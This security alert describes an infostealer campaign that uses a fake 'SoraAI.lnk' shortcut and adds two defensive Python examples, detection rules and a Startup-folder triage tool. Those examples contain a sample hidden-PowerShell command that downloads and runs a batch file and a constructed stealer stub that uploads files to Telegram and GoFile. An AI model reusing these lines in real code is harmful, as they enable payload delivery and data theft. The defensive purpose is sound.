Fake Sora AI Lure Installs Infostealer

June 11, 2025
in Alerts

Threat actors are abusing the popularity of OpenAI’s Sora, a text-to-video generation model, to distribute information-stealing malware. The lure is a Windows shortcut file named “SoraAI.lnk” that borrows Sora’s branding; opening it starts a multi-stage infection chain rather than any AI tool. The campaign is another instance of social engineering that trades on user trust in well-known AI products.

The chain starts when the user double-clicks “SoraAI.lnk”. The shortcut’s target launches a hidden PowerShell process, which downloads a batch file from a GitHub repository. That script retries the download of additional payloads in a loop, so a transient network failure on the first attempt does not stop the infection (this is retry logic, not persistence). Further batch files then install legitimate Python packages, including requests and cryptography, and use them to run a malicious Python script named “python.py”, the core of the malware. That script places itself in the user’s Startup folder so that it runs automatically at every logon, which is where persistence is actually established.
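The process chain described above, as an added example that is not code from the article or from the malware: detection logic run over constructed Sysmon-style process-creation events. The field layout, rule names, GitHub path, user names and Python install path are assumptions made for the example; the behavioural tells (explorer.exe spawning a hidden PowerShell, a .bat fetched from GitHub, pip installing requests and cryptography, a Python script executed from the Startup folder) are the ones the article describes.

```python
"""Detection rules for the SoraAI.lnk infection chain.

Added example, not code from the article or the malware. Events are
constructed Sysmon-like process-creation records (parent image, image,
command line); the .lnk itself never appears as a process, so the first
observable stage is explorer.exe launching a hidden PowerShell.
"""
import re
from typing import Dict, List, Tuple

# Constructed sample events: one per stage of the described chain, then
# two benign events that must not match.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -c \"iwr "
                "https://raw.githubusercontent.com/example/repo/main/stage1.bat "
                "-OutFile $env:TEMP\\s.bat; & $env:TEMP\\s.bat\""},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Users\victim\AppData\Local\Programs\Python\Python312\python.exe",
     "cmdline": "python.exe -m pip install requests cryptography"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Users\victim\AppData\Local\Programs\Python\Python312\python.exe",
     "cmdline": r'python.exe "C:\Users\victim\AppData\Roaming\Microsoft\Windows'
                r'\Start Menu\Programs\Startup\python.py"'},
    # Benign: an admin opening a visible PowerShell session from the desktop.
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe"},
    # Benign: a developer running a project script from an editor.
    {"parent": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "image": r"C:\Users\dev\AppData\Local\Programs\Python\Python312\python.exe",
     "cmdline": r"python.exe C:\Users\dev\proj\main.py"},
]

# -w hidden / -WindowStyle Hidden: the user sees nothing when the .lnk runs.
HIDDEN_PS = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
# A batch file pulled straight from GitHub, as in the first download stage.
GITHUB_BAT = re.compile(r"https?://(?:raw\.githubusercontent\.com|github\.com)/\S+\.bat", re.I)
# A script executed out of the per-user Startup folder (the persistence stage).
STARTUP_SCRIPT = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\"]+\.(?:py|pyw|bat|lnk)", re.I)


def match_rules(ev: Dict[str, str]) -> List[str]:
    """Return the names of every rule the event trips, in a fixed order."""
    hits: List[str] = []
    parent = ev["parent"].lower()
    image = ev["image"].lower()
    cmd = ev["cmdline"]
    if image.endswith("powershell.exe") and parent.endswith("explorer.exe") and HIDDEN_PS.search(cmd):
        hits.append("hidden_powershell_from_shortcut")
    if GITHUB_BAT.search(cmd):
        hits.append("batch_stage_from_github")
    if image.endswith("python.exe") and "pip" in cmd and all(p in cmd for p in ("requests", "cryptography")):
        hits.append("pip_install_stealer_deps")
    if image.endswith(("python.exe", "pythonw.exe")) and STARTUP_SCRIPT.search(cmd):
        hits.append("python_script_in_startup_folder")
    return hits


def scan(events: List[Dict[str, str]]) -> List[Tuple[int, List[str]]]:
    """Evaluate every event; return (index, hits) for those that matched."""
    findings = []
    for idx, ev in enumerate(events):
        hits = match_rules(ev)
        if hits:
            findings.append((idx, hits))
    return findings


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(hits)}")
```

The pip rule on its own is noisy in developer environments; what makes it worth alerting on here is the sequence, a hidden PowerShell followed within minutes by a user-context pip install and then a script running from Startup, so correlate the three rules on the same host rather than paging on any one of them.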

The malware’s main job is to collect and exfiltrate sensitive personal and financial data from the infected host. It extracts cookies, saved passwords and user profiles from Chrome, Firefox and Opera; gathers system information, saved Wi-Fi credentials and cryptocurrency wallet data; and pulls configuration data from popular gaming platforms. The harvested data is compressed into a zip archive and sent to the attackers through the Telegram Bot API. Files larger than 49MB are instead uploaded to the external file-hosting service GoFile.io, a threshold that lines up with the 50MB cap the Telegram Bot API places on files a bot can send.

The stealer also scavenges for documents with common extensions such as PDF, JPG and TXT in high-value directories like the user’s Downloads and Documents folders, which widens the exposure well beyond credentials. For users the practical rule is simple: a shortcut file cannot “install” an AI service, and a .lnk that launches a hidden PowerShell window is a red flag on its own. Download software only from the vendor’s own site, check what a file actually is before opening it (Windows hides the .lnk extension even when other extensions are shown), and keep endpoint protection current. For defenders, the chain leaves clear signals: explorer.exe spawning a hidden PowerShell, batch files fetched from GitHub, pip installing packages in a user context, a Python script in the Startup folder, and outbound uploads to api.telegram.org or gofile.io.
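The persistence and exfiltration traits described above, as an added example that is not the article’s or the malware’s code: a host triage helper that lists script files in a Startup folder and, without executing anything, pulls the Telegram Bot API endpoint, bot token, chat id and GoFile upload URL out of any Python it finds, so an analyst gets blocklist and takedown material straight from the sample. The folder and the stealer-like script in it are constructed in a temporary directory; the token, chat id and GoFile URL are fake placeholders, and the token regex is an approximation of the bot-token format.

```python
"""Startup-folder triage for a Python infostealer that exfiltrates via Telegram.

Added example, not code from the article or the malware. Run it against
%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup on a suspect
host; the demo folder below stands in for that path.
"""
import re
import tempfile
from pathlib import Path
from typing import Dict, List

# Constructed stand-in for the "python.py" the article describes. Token,
# chat id and upload URL are fake.
FAKE_STEALER = r'''
import requests
TOKEN = "123456789:AAExampleExampleExampleExampleExam0"
CHAT_ID = "987654321"
def send(path):
    url = f"https://api.telegram.org/bot{TOKEN}/sendDocument"
    requests.post(url, data={"chat_id": CHAT_ID}, files={"document": open(path, "rb")})
def big(path):
    requests.post("https://store1.gofile.io/uploadFile", files={"file": open(path, "rb")})
'''

# Anything executable-by-double-click that has no business in Startup.
SCRIPT_EXT = {".py", ".pyw", ".bat", ".cmd", ".vbs", ".ps1", ".lnk"}
TEXT_EXT = SCRIPT_EXT - {".lnk"}          # .lnk is binary; list it but do not grep it
TG_API = re.compile(r"api\.telegram\.org/bot")
# Approximate bot-token shape: numeric bot id, colon, long alphanumeric secret.
TG_TOKEN = re.compile(r"\b(\d{8,10}):([A-Za-z0-9_-]{30,45})\b")
CHAT_ID = re.compile(r"chat_id\W{0,5}(\d{5,15})|CHAT_ID\s*=\s*[\"'](\d{5,15})[\"']")
GOFILE = re.compile(r"https?://[a-z0-9.-]*gofile\.io[^\s\"')]*", re.I)


def triage_startup(folder: Path) -> List[Dict]:
    """Describe every script-like file in the folder and extract exfil IOCs."""
    findings: List[Dict] = []
    for p in sorted(folder.iterdir()):
        if p.suffix.lower() not in SCRIPT_EXT:
            continue                      # desktop.ini and the like
        f = {"file": p.name, "size": p.stat().st_size, "telegram_api": False,
             "bot_tokens": [], "chat_ids": [], "gofile_urls": []}
        if p.suffix.lower() in TEXT_EXT:
            text = p.read_text(errors="replace")   # read only, never execute
            f["telegram_api"] = bool(TG_API.search(text))
            f["bot_tokens"] = [f"{a}:{b}" for a, b in TG_TOKEN.findall(text)]
            f["chat_ids"] = sorted({x or y for x, y in CHAT_ID.findall(text)})
            f["gofile_urls"] = GOFILE.findall(text)
        findings.append(f)
    return findings


def build_demo_folder() -> Path:
    """Create a throwaway Startup folder with one stealer and two benign files."""
    d = Path(tempfile.mkdtemp(prefix="startup_demo_"))
    (d / "python.py").write_text(FAKE_STEALER)
    (d / "desktop.ini").write_text("[.ShellClassInfo]")   # normal folder metadata
    (d / "Notes.lnk").write_bytes(b"L\x00\x00\x00")       # a shortcut: listed, not parsed
    return d


if __name__ == "__main__":
    for f in triage_startup(build_demo_folder()):
        print(f)
```

A recovered bot token is the most useful artefact here: it identifies the attacker’s bot to Telegram for a takedown request and, together with the chat id, lets you scope which victims reported to the same channel. The same patterns applied to proxy logs (POSTs to api.telegram.org/bot…/sendDocument and to gofile.io from a Python user agent) give the network-side detection for the exfiltration stage.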

Reference:

  • A SoraAI clickbait
Tags: AI, Cyber Alerts, Cyber Alerts 2025, Cyberattack, Cybersecurity, June 2025, OpenAI, Sora
